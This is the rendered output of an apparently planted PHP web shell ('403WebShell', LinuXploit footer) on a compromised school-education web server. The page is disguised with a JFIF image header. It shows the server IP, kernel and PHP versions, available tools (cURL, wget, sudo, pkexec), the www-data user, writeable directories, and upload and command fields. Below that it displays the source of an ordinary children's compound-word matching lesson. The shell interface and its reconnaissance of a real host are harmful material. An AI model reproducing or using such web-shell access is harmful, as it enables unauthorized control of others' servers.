????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.139.237.30
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/apps/school/www_old10/Html/LevelF/Category1/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/apps/school/www_old10/Html/LevelF/Category1/LevelFCat1Lesson39.html
<!doctype html>
<html>
    <head>
        <title>Matchings and enter the correct compound word</title>
        <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
        <script>
            
            function page_preLoad()
            {                
                s_setDeviceTypeLevelCategoryLastLesson(Level.F, Category.No1);
                s_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
                
                s_setHeaderTable('id_tblHeader', s_title_page, s_getSubTitle(Level.F, Category.No1, 39), true, true);
                s_setFooterTable('id_tblFooter', true, true, true, true, true);
                
                var ids_headings = ['id_td_heading1', 'id_td_heading2'];
                var ids_boxes = ['id_dropbox_port', 'id_dropbox_day', 'id_dropbox_board', 'id_dropbox_nut', 'id_dropbox_case', 'id_dropbox_cast'];
                var ids_options = ['id_td_nut', 'id_td_case', 'id_td_cast', 'id_td_day', 'id_td_port', 'id_td_board'];
                var ids_spans = ['id_span_nut', 'id_span_case', 'id_span_cast', 'id_span_day', 'id_span_port', 'id_span_board'];
                
                var ids_texts = new Array();
                
                for (var textId = 1; textId <= 13; textId++)
                {
                    ids_texts.push('id_td_text' + textId);
                }
                
                var ids_textBoxes = new Array();
                
                for (var textBoxId = 1; textBoxId <= 6; textBoxId++)
                {
                    var idTextBox = 'id_textBox' + textBoxId;
                    var eTextBox = document.getElementById(idTextBox);
                    eTextBox.value = '';
                    
                    if (s_currentDeviceType == s_DeviceTypeAndroidDeviceApp)
                    {
                        eTextBox.style.border = 'solid 2px black';
                    }
                    
                    ids_textBoxes.push(idTextBox);
                }
                
                var ids_All = ids_headings.concat(ids_texts, ids_boxes, ids_options);
                
                s_adjust_fontSize_for_ids_all_devices(ids_All, 70);
                s_adjust_fontSize_for_ids_all_devices(ids_textBoxes, 90);
                
                s_init_dropBox_tds_with_drag_here(ids_boxes);
                s_init_dropping_spans(ids_spans);
                
                var id_tables_array = ['id_table1', 'id_table2'];
                s_border_collapse_for_tables_except_android(id_tables_array);
            }
        
            function page_onLoad()
            {

            }
        
            function btnHome_click()
            {
                s_btnHomeCategories_click('LevelF');
            }
        
            function btnPrevious_click()
            {
                window.location = 'LevelFCat1Lesson38.html';
            }
            
            function btnNext_click()
            {
                window.location = 'LevelFCat1Lesson40.html';
            }
        
            function DragDrop(id_dropBox, ids_array)
            {
                if (s_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array))
                {
                    s_setTextAndBackgroundColorToGreenAndIsMovedTrue(s_currentDropingId, id_dropBox);
                    
                    s_set_currentDropingId_draggbleToFalse();
                }
                else
                {
                    s_resetCurrentDroppingPosition(id_dropBox);
                }
            }
        
            function btnValidate_click()
            {
                var ids_boxes = ['id_dropbox_port', 'id_dropbox_day', 'id_dropbox_board', 'id_dropbox_nut', 'id_dropbox_case', 'id_dropbox_cast'];
                var isAllBoxesFilled = s_isAllInfosFilled(ids_boxes);
                
                var eTextBox1Value = document.getElementById('id_textBox1').value.toUpperCase();
                var eTextBox2Value = document.getElementById('id_textBox2').value.toUpperCase();
                var eTextBox3Value = document.getElementById('id_textBox3').value.toUpperCase();
                var eTextBox4Value = document.getElementById('id_textBox4').value.toUpperCase();
                var eTextBox5Value = document.getElementById('id_textBox5').value.toUpperCase();
                var eTextBox6Value = document.getElementById('id_textBox6').value.toUpperCase();
                
                if (isAllBoxesFilled &&
                    (eTextBox1Value != '') &&
                    (eTextBox2Value != '') &&
                    (eTextBox3Value != '') &&
                    (eTextBox4Value != '') &&
                    (eTextBox5Value != '') &&
                    (eTextBox6Value != ''))
                    {
                        s_show_claps_animation('s_id_div_message');
                    }
            }
        </script>

    </head>
    <body onload="page_onLoad()">
        
        <div id="s_id_div_message"></div>
        
        <table id="id_tblMainiPadBody" border="1px" cellspacing="0" cellpadding="0">
            <tr height="8%">
                <td>
                    <div id="id_tblHeader"></div>
                </td>
            </tr>
            <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
                <td>
                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                        <tr>
                            <td>
                                <table width="100%" height="100%" border="0" cellpadding="2%" cellspacing="0">
                                    <tr height="40%">
                                        <td style="padding-bottom:0px">
                                            <table id="id_table1" width="100%" height="100%" border="1" cellpadding="0" cellspacing="0">
                                                <tr height="10%">
                                                    <td id="id_td_heading1" class="s_style_heading">Match the following from right to left:
                                                    </td>
                                                </tr>
                                                <tr height="*">
                                                    <td>
                                                        <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none">
                                                            <tr height="5%">
                                                                <td width="60%" style="border-left:none; border-top:none; border-bottom:none">
                                                                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                                        <tr>
                                                                            <td width="*">
                                                                                <table width="100%" height="100%" border="0" cellspacing="2%" cellpadding="0">
                                                                                    <tr id="id_tr_dropbox_port" height="16.6%"
                                                                                        ondragover="s_highlight('id_dropbox_port'); s_allowDrop_web(event)"
                                                                                        ondragleave="s_un_highlight('id_dropbox_port')"
                                                                                        ondrop="DragDrop('id_dropbox_port', ['id_span_port'])">
                                                                                        <td id="id_td_text1" class="s_style_textBlack_padding_left" width="60%" align="center">Air</td>
                                                                                        <td id="id_dropbox_port" class="s_style_droppable_dash" width="*" align="center">_______</td>
                                                                                    </tr>
                                                                                    <tr id="id_tr_dropbox_day" height="16.6%"
                                                                                        ondragover="s_highlight('id_dropbox_day'); s_allowDrop_web(event)"
                                                                                        ondragleave="s_un_highlight('id_dropbox_day')"
                                                                                        ondrop="DragDrop('id_dropbox_day', ['id_span_day'])">
                                                                                        <td id="id_td_text2" class="s_style_textBlack_padding_left" width="35%" align="center">Birth</td>
                                                                                        <td id="id_dropbox_day" class="s_style_droppable_dash" width="*" align="center">_______</td>
                                                                                    </tr>
                                                                                    <tr id="id_tr_dropbox_board" height="16.6%"
                                                                                        ondragover="s_highlight('id_dropbox_board'); s_allowDrop_web(event)"
                                                                                        ondragleave="s_un_highlight('id_dropbox_board')"
                                                                                        ondrop="DragDrop('id_dropbox_board', ['id_span_board'])">
                                                                                        <td id="id_td_text3" class="s_style_textBlack_padding_left" width="35%" align="center">Card</td>
                                                                                        <td id="id_dropbox_board" class="s_style_droppable_dash" width="*" align="center">_______</td>
                                                                                    </tr>
                                                                                    <tr id="id_tr_dropbox_nut" height="16.6%"
                                                                                        ondragover="s_highlight('id_dropbox_nut'); s_allowDrop_web(event)"
                                                                                        ondragleave="s_un_highlight('id_dropbox_nut')"
                                                                                        ondrop="DragDrop('id_dropbox_nut', ['id_span_nut'])">
                                                                                        <td id="id_td_text4" class="s_style_textBlack_padding_left" width="35%" align="center">Ground</td>
                                                                                        <td id="id_dropbox_nut" class="s_style_droppable_dash" width="*" align="center">_______</td>
                                                                                    </tr>
                                                                                    <tr id="id_tr_dropbox_case" height="16.6%"
                                                                                        ondragover="s_highlight('id_dropbox_case'); s_allowDrop_web(event)"
                                                                                        ondragleave="s_un_highlight('id_dropbox_case')"
                                                                                        ondrop="DragDrop('id_dropbox_case', ['id_span_case'])">
                                                                                        <td id="id_td_text5" class="s_style_textBlack_padding_left" width="35%" align="center">Stair</td>
                                                                                        <td id="id_dropbox_case" class="s_style_droppable_dash" width="*" align="center">_______</td>
                                                                                    </tr>
                                                                                    <tr id="id_tr_dropbox_cast" height="*"
                                                                                        ondragover="s_highlight('id_dropbox_cast'); s_allowDrop_web(event)"
                                                                                        ondragleave="s_un_highlight('id_dropbox_cast')"
                                                                                        ondrop="DragDrop('id_dropbox_cast', ['id_span_cast'])">
                                                                                        <td id="id_td_text6" class="s_style_textBlack_padding_left" width="35%" align="center">Fore</td>
                                                                                        <td id="id_dropbox_cast" class="s_style_droppable_dash" width="*" align="center">_______</td>
                                                                                    </tr>
                                                                                </table>
                                                                            </td>
                                                                            <td id="id_td_text7" width="2%">&nbsp;</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                                <td width="*" style="border-top:none; border-left:none; border-right:none; border-bottom:none">
                                                                    <table width="100%" height="100%" border="0" cellspacing="2%" cellpadding="0">
                                                                        <tr height="16.6%">
                                                                            <td id="id_td_nut" class="s_style_draggable_text" align="center" draggable="true" ondragstart="s_dragStartNew(event)">
                                                                                <span id="id_span_nut">nut</span>
                                                                            </td>
                                                                        </tr>
                                                                        <tr height="16.6%">
                                                                            <td id="id_td_case" class="s_style_draggable_text" align="center" draggable="true" ondragstart="s_dragStartNew(event)">
                                                                                <span id="id_span_case">case</span>
                                                                            </td>
                                                                        </tr>
                                                                        <tr height="16.6%">
                                                                            <td id="id_td_cast" class="s_style_draggable_text" align="center" draggable="true" ondragstart="s_dragStartNew(event)">
                                                                                <span id="id_span_cast">cast</span>
                                                                            </td>
                                                                        </tr>
                                                                        <tr height="16.6%">
                                                                            <td id="id_td_day" class="s_style_draggable_text" align="center" draggable="true" ondragstart="s_dragStartNew(event)">
                                                                                <span id="id_span_day">day</span>
                                                                            </td>
                                                                        </tr>
                                                                        <tr height="16.6%">
                                                                            <td id="id_td_port" class="s_style_draggable_text" align="center" draggable="true" ondragstart="s_dragStartNew(event)">
                                                                                <span id="id_span_port">port</span>
                                                                            </td>
                                                                        </tr>
                                                                        <tr height="*">
                                                                            <td id="id_td_board" class="s_style_draggable_text" align="center" draggable="true" ondragstart="s_dragStartNew(event)">
                                                                                <span id="id_span_board">board</span>
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                    <tr height="*">
                                        <td>
                                            <table id="id_table2" width="100%" height="100%" border="1" cellpadding="0" cellspacing="0">
                                                <tr height="6%">
                                                    <td id="id_td_heading2" class="s_style_heading">Enter the correct compound word:
                                                    </td>
                                                </tr>
                                                <tr height="*">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                            <tr height="33%">
                                                                <td width="50%">
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr>
                                                                            <td width="50%" align="center">
                                                                                <img src="../../../img/LevelF/Category1/LevelFCat1Lesson39/carpet.png" width="50%"  alt="" draggable="false"/>
                                                                            </td>
                                                                            <td id="id_td_text8" width="*">
                                                                                <textarea id="id_textBox1" class="s_style_droppable_dash" style="width:80%; text-align:center; resize:none" rows="1">
                                                                                </textarea>
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                                <td width="*">
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr>
                                                                            <td width="50%" align="center">
                                                                                <img src="../../../img/LevelF/Category1/LevelFCat1Lesson39/cupboard.png" width="50%"  alt="" draggable="false"/>
                                                                            </td>
                                                                            <td id="id_td_text9" width="*">
                                                                                <textarea id="id_textBox2" class="s_style_droppable_dash" style="width:80%; text-align:center; resize:none" rows="1">
                                                                                </textarea>
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr height="33%">
                                                                <td width="50%">
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr>
                                                                            <td width="50%" align="center">
                                                                                <img src="../../../img/LevelF/Category1/LevelFCat1Lesson39/backPack.png" width="55%"  alt="" draggable="false"/>
                                                                            </td>
                                                                            <td id="id_td_text10" width="*">
                                                                                <textarea id="id_textBox3" class="s_style_droppable_dash" style="width:80%; text-align:center; resize:none" rows="1">
                                                                                </textarea>
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                                <td width="*">
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr>
                                                                            <td width="50%" align="center">
                                                                                <img src="../../../img/LevelF/Category1/LevelFCat1Lesson39/briefcase.png" width="55%"  alt="" draggable="false"/>
                                                                            </td>
                                                                            <td id="id_td_text11" width="*">
                                                                                <textarea id="id_textBox4" class="s_style_droppable_dash" style="width:80%; text-align:center; resize:none" rows="1">
                                                                                </textarea>
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr height="*">
                                                                <td width="50%">
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr>
                                                                            <td width="50%" align="center">
                                                                                <img src="../../../img/LevelF/Category1/LevelFCat1Lesson39/popcorn.png" width="60%"  alt="" draggable="false"/>
                                                                            </td>
                                                                            <td id="id_td_text12" width="*">
                                                                                <textarea id="id_textBox5" class="s_style_droppable_dash" style="width:80%; text-align:center; resize:none" rows="1">
                                                                                </textarea>
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                                <td width="*">
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr>
                                                                            <td width="50%" align="center">
                                                                                <img src="../../../img/LevelF/Category1/LevelFCat1Lesson39/necktie.png" width="30%"  alt="" draggable="false"/>
                                                                            </td>
                                                                            <td id="id_td_text13" width="*">
                                                                                <textarea id="id_textBox6" class="s_style_droppable_dash" style="width:80%; text-align:center; resize:none" rows="1">
                                                                                </textarea>
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                </table>
                            </td>
                        </tr>
                    </table>
                </td>
            </tr>
            <tr height="8%">
                <td>
                    <div id="id_tblFooter"></div>
                </td>
            </tr>
        </table>
        <script>
            page_preLoad();
            
            new webkit_draggable('id_span_nut', {handle : 'id_td_nut', revert : true, scroll : false, onStart : function(){s_dragStartNew(event)}});
            new webkit_draggable('id_span_case', {handle : 'id_td_case', revert : true, scroll : false, onStart : function(){s_dragStartNew(event)}});
            new webkit_draggable('id_span_cast', {handle : 'id_td_cast', revert : true, scroll : false, onStart : function(){s_dragStartNew(event)}});
            new webkit_draggable('id_span_day', {handle : 'id_td_day', revert : true, scroll : false, onStart : function(){s_dragStartNew(event)}});
            new webkit_draggable('id_span_port', {handle : 'id_td_port', revert : true, scroll : false, onStart : function(){s_dragStartNew(event)}});
            new webkit_draggable('id_span_board', {handle : 'id_td_board', revert : true, scroll : false, onStart : function(){s_dragStartNew(event)}});
            
            webkit_drop.add('id_tr_dropbox_board', {onOver : function(){s_highlight('id_dropbox_board')}, onOut : function(){s_un_highlight('id_dropbox_board')}, onDrop : function(){DragDrop('id_dropbox_board', ['id_span_board'])}});
            webkit_drop.add('id_tr_dropbox_cast', {onOver : function(){s_highlight('id_dropbox_cast')}, onOut : function(){s_un_highlight('id_dropbox_cast')}, onDrop : function(){DragDrop('id_dropbox_cast', ['id_span_cast'])}});
            webkit_drop.add('id_tr_dropbox_case', {onOver : function(){s_highlight('id_dropbox_case')}, onOut : function(){s_un_highlight('id_dropbox_case')}, onDrop : function(){DragDrop('id_dropbox_case', ['id_span_case'])}});
            webkit_drop.add('id_tr_dropbox_port', {onOver : function(){s_highlight('id_dropbox_port')}, onOut : function(){s_un_highlight('id_dropbox_port')}, onDrop : function(){DragDrop('id_dropbox_port', ['id_span_port'])}});
            webkit_drop.add('id_tr_dropbox_day', {onOver : function(){s_highlight('id_dropbox_day')}, onOut : function(){s_un_highlight('id_dropbox_day')}, onDrop : function(){DragDrop('id_dropbox_day', ['id_span_day'])}});
            webkit_drop.add('id_tr_dropbox_nut', {onOver : function(){s_highlight('id_dropbox_nut')}, onOut : function(){s_un_highlight('id_dropbox_nut')}, onDrop : function(){DragDrop('id_dropbox_nut', ['id_span_nut'])}});
            
        </script>
    </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit